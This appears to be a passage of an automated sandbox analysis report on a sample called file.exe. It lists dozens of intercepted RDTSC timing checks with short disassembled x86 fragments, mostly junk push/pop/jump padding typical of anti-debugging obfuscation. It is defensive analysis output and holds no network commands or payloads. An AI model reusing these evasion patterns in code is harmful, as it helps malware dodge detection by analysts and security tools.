          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFB39A second address: BFB3C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F174075FE7Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F174075FE7Eh 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFB3C6 second address: BFB3CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C017E9 second address: C017FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jmp 00007F174075FE7Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C017FF second address: C01808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01808 second address: C0180C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C04325 second address: C0432F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F17414E33F6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0432F second address: C0434C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Fh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0434C second address: C04350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C04350 second address: C04377 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE87h 0x00000007 jnc 00007F174075FE76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C04377 second address: C04394 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3403h 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F17414E33F6h 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C04394 second address: C0439A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C04191 second address: C04197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0D09F second address: C0D0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0BA25 second address: C0BA29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0BA29 second address: C0BA38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnc 00007F174075FE76h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0BA38 second address: C0BA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 jmp 00007F17414E33FCh 0x0000000d jmp 00007F17414E3406h 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F17414E3408h 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0BA7D second address: C0BA93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE82h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0BA93 second address: C0BA9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0BEFF second address: C0BF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F174075FE89h 0x00000009 popad 0x0000000a jnc 00007F174075FE82h 0x00000010 pop ecx 0x00000011 push ebx 0x00000012 jmp 00007F174075FE84h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0C0A8 second address: C0C0C4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F17414E3402h 0x00000008 jng 00007F17414E33F6h 0x0000000e jc 00007F17414E33F6h 0x00000014 push eax 0x00000015 push edx 0x00000016 jns 00007F17414E33F6h 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0CDC8 second address: C0CDCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0CDCC second address: C0CDEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F17414E33FCh 0x0000000c push esi 0x0000000d jmp 00007F17414E33FEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FCD6 second address: C0FCE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jng 00007F174075FE76h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FCE7 second address: C0FCEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FCEB second address: C0FCF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FCF1 second address: C0FD02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FD02 second address: C0FD08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F8BA second address: C0F8D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007F17414E33FBh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F8D9 second address: C0F8E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F8E4 second address: C0F90B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17414E33FBh 0x00000009 jmp 00007F17414E3406h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F90B second address: C0F91C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F174075FE7Ch 0x0000000b ja 00007F174075FE76h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1B4F6 second address: C1B4FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C20BF6 second address: C20BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C20BFA second address: C20C35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F17414E33FAh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jp 00007F17414E340Ch 0x00000018 jmp 00007F17414E3406h 0x0000001d popad 0x0000001e push ecx 0x0000001f jnl 00007F17414E33F8h 0x00000025 push ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C22F22 second address: C22F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C22F26 second address: C22F32 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F17414E33F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C22F32 second address: C22F37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C22DCC second address: C22DD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C22DD0 second address: C22DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnp 00007F174075FE7Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C255A3 second address: C255C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F17414E33F6h 0x00000009 jmp 00007F17414E3405h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C25442 second address: C2544F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F174075FE76h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2544F second address: C25455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1E7B6 second address: C1E7CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F174075FE84h 0x00000009 popad 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1E7CF second address: C1E7D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1E7D7 second address: C1E7DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C31DB7 second address: C31DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C31BDB second address: C31C03 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F174075FE76h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jbe 00007F174075FE76h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jg 00007F174075FE76h 0x0000001d jo 00007F174075FE76h 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C31C03 second address: C31C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C31C09 second address: C31C0F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C31C0F second address: C31C3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F17414E33FCh 0x00000008 js 00007F17414E33F6h 0x0000000e jmp 00007F17414E3407h 0x00000013 popad 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C34AD7 second address: C34ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C346D6 second address: C34705 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3404h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F17414E3407h 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C49112 second address: C49121 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C49121 second address: C49125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C49125 second address: C4912B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C492B6 second address: C492D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17414E3409h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C492D3 second address: C492D9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C49B45 second address: C49B72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3404h 0x00000007 jng 00007F17414E33F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F17414E33FBh 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C49E47 second address: C49E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F174075FE76h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4A026 second address: C4A02C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CED1 second address: C4CEE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F174075FE82h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CEE7 second address: C4CEEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4E317 second address: C4E32C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F174075FE76h 0x0000000a popad 0x0000000b jmp 00007F174075FE7Ah 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4E32C second address: C4E332 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4E332 second address: C4E336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4E336 second address: C4E35A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F17414E3407h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4FB22 second address: C4FB40 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F174075FE7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F174075FE7Eh 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0035E second address: 4C00375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17414E3403h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C00375 second address: 4C00379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C00379 second address: 4C00387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C00387 second address: 4C003A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F174075FE7Ch 0x0000000a or ch, 00000018h 0x0000000d jmp 00007F174075FE7Bh 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C003A8 second address: 4C003E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3409h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F17414E3408h 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C003E3 second address: 4C003E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C003E7 second address: 4C003ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C003ED second address: 4C00432 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F174075FE7Dh 0x00000013 adc si, 5176h 0x00000018 jmp 00007F174075FE81h 0x0000001d popfd 0x0000001e popad 0x0000001f mov ecx, dword ptr [ebp+08h] 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C00432 second address: 4C00436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C00436 second address: 4C0043A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0043A second address: 4C00440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2057E second address: 4C2059C instructions: 0x00000000 rdtsc 0x00000002 movsx edi, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F174075FE83h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2059C second address: 4C205A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C205A1 second address: 4C205C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F174075FE85h 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C205C5 second address: 4C205C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C205C9 second address: 4C205CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C205CF second address: 4C205FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F17414E3400h 0x00000009 adc si, 41A8h 0x0000000e jmp 00007F17414E33FBh 0x00000013 popfd 0x00000014 movzx ecx, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C205FF second address: 4C2061A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov ax, di 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop edx 0x00000010 jmp 00007F174075FE7Ah 0x00000015 popad 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2061A second address: 4C20620 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20620 second address: 4C20658 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F174075FE7Ah 0x00000015 jmp 00007F174075FE85h 0x0000001a popfd 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20658 second address: 4C20695 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F17414E3400h 0x00000008 add esi, 2D60D3F8h 0x0000000e jmp 00007F17414E33FBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov edi, ecx 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F17414E3400h 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20695 second address: 4C206CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F174075FE82h 0x00000012 and cl, FFFFFFB8h 0x00000015 jmp 00007F174075FE7Bh 0x0000001a popfd 0x0000001b movzx ecx, di 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C206CF second address: 4C20737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 mov edx, eax 0x00000009 pushfd 0x0000000a jmp 00007F17414E3402h 0x0000000f xor ecx, 1A8FD248h 0x00000015 jmp 00007F17414E33FBh 0x0000001a popfd 0x0000001b popad 0x0000001c mov dword ptr [esp], esi 0x0000001f jmp 00007F17414E3406h 0x00000024 lea eax, dword ptr [ebp-04h] 0x00000027 pushad 0x00000028 mov ecx, 2DA0C2FDh 0x0000002d mov di, si 0x00000030 popad 0x00000031 nop 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F17414E33FEh 0x0000003b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20737 second address: 4C20746 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
